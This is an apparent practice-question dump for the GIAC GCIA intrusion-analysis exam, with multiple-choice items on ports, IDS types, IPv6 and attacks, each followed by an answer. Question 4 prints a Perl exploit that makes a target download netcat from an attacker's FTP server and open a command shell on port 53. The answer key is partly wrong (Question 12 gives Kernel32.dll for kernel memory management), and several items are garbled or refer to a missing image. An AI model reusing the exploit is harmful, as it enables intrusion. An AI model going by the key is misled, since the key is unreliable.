GCIA | The Secret Of GIAC GCIA Practice

NEW QUESTION 1
Which of the following ports is used by NTP for communication?

• A. 143
• B. 123
• C. 161
• D. 53

Answer: B

NEW QUESTION 2
Which of the following commands displays the IPX routing table entries?

• A. sh ipx traffic
• B. sh ipx route
• C. sh ipx int e0
• D. sho ipx servers

Answer: B

NEW QUESTION 3
Which of the following intrusion detection systems (IDS) monitors network traffic and compares it against an established baseline?

• A. Signature-based
• B. Network-based
• C. File-based
• D. Anomaly-based

Answer: D

NEW QUESTION 4
Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl
msadc.pl -h
$host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system
("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo
bin>>sasfile\"");
system("perl
msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo get
hacked.
html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server
is
downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download
is
finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

• A. Opens up a SMTP server that requires no username or password
• B. Creates a share called "sasfile" on the target system
• C. Creates an FTP server with write permissions enabled
• D. Opens up a telnet listener that requires no username or password

Answer: D

NEW QUESTION 5
What is the name of the first computer virus that infected the boot sector of the MS-DOS operating system?

• A. Sircam
• B. Stoner
• C. Code Red
• D. Brain

Answer: D

NEW QUESTION 6
Which of the following is the default port for TACACS?

• A. UDP port 49
• B. TCP port 80
• C. TCP port 25
• D. TCP port 443

Answer: A

NEW QUESTION 7
Which of the following terms is used to represent IPv6 addresses?

• A. Hexadecimal-dot notation
• B. Colon-dot
• C. Dot notation
• D. Colon-hexadecimal

Answer: D

NEW QUESTION 8
Adam, a malicious hacker purposely sends fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes.
On the basis of above information, which of the following types of attack is Adam attempting to perform?

• A. Fraggle attack
• B. SYN Flood attack
• C. Land attack
• D. Ping of death attack

Answer: D

NEW QUESTION 9
You work as a Network Administrator for Net Perfect Inc. The company has a Windows Server
2008 network environment. The servers on the network run Windows Server 2008 R2. All client computers on the network run Windows 7 Ultimate. You have configured DirectAccess feature on the laptop of few sales managers so that they can access corporate network from remote locations. Their laptops run Windows 7 Ultimate. Which of the following options does the DirectAccess use to keep data safer while traveling through travels public networks?

• A. IPv6-over-IPsec
• B. IPSec-over-IPv4
• C. VPN
• D. SSL

Answer: A

NEW QUESTION 10
HOTSPOT
You work as a Network Administrator for McRobert Inc. The company's Windows 2000-based network is configured with Internet Security and Acceleration (ISA) Server 2000. You are configuring intrusion detection on the server. You want to get notified when a TCP SYN packet is sent with a spoofed source IP address and port number that match the destination IP address and port number. Mark the alert that you will enable on the Intrusion Detection tab page of the IP Packet Filters Properties dialog box to accomplish the task.

• A. Yes
• B. Not Mastered

Answer: A

NEW QUESTION 11
Which of the following tools are used to determine the hop counts of an IP packet?
Each correct answer represents a complete solution. Choose two.

• A. TRACERT
• B. Ping
• C. IPCONFIG
• D. Netstat

Answer: AB

NEW QUESTION 12
Which of the following Windows XP system files handles memory management, I/O operations, and interrupts?

• A. Ntoskrnl.exe
• B. Advapi32.dll
• C. Kernel32.dll
• D. Win32k.sys

Answer: C

NEW QUESTION 13
Which of the following is the process of categorizing attack alerts produced from IDS?

• A. Site policy implementation
• B. Blocking
• C. Intrusion classify
• D. Alarm filtering

Answer: D

NEW QUESTION 14
This tool is known as __________.

• A. Kismet
• B. Absinthe
• C. NetStumbler
• D. THC-Scan

Answer: C

NEW QUESTION 15
In which of the following IDS evasion techniques does an attacker deliver data in multiple small sized packets, which makes it very difficult for an IDS to detect the attack signatures of such attacks?

• A. Insertion
• B. Session splicing
• C. Fragmentation overlap
• D. Fragmentation overwrite

Answer: B

NEW QUESTION 16
Which of the following IPv6 address types is a single address that can be assigned to multiple interfaces?

• A. Unicast
• B. Anycast
• C. Loopback
• D. Multicast

Answer: B

NEW QUESTION 17
You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 Active Directory-based single forest multiple domain IPv4 network. All the DNS servers on the network run Windows Server 2008. The users in the network use NetBIOS name to connect network application on the network. You have migrated the network to IPv6-enabled network. Now you want to enable DNS Server to perform lookups in GlobalNames Zone. Which of the following commands will you use to accomplish the task?

• A. Dnscmd <server name> /config /enableglobalnames 1
• B. Dnscmd <server name> /config /enableglobalnamessupport 0
• C. Dnscmd <server name> /config /enableglobalnamessupport 1
• D. Dnscmd <server name> /config /globalnamesqueryorder 0

Answer: C

NEW QUESTION 18
You work as a Desktop Support Technician for umbrella Inc. The company uses a Windows-based network. An employee of the production department is facing the problem in the IP configuration of the network connection.
He called you to resolve the issue. You suspect that the IP configuration is not configured properly. You want to use the ping command to ensure that IPv4 protocol is working on a computer. While running the ping command from the command prompt, you find that Windows Firewall is blocking the ping command. You enter the following command in the elevated command prompt on the computer:
netsh advfirewall firewall add rule name="ICMPv4" protocol=icmpv4:any,any dir=in action=allow
Which of the following actions will this command perform?

• A. Permit ICMPv4 packet to pass through the firewal
• B. Permit ICMPv4 Echo Reques
• C. Enable packet filtering by Windows Firewal
• D. Disable Firewall temporaril

Answer: A

NEW QUESTION 19
......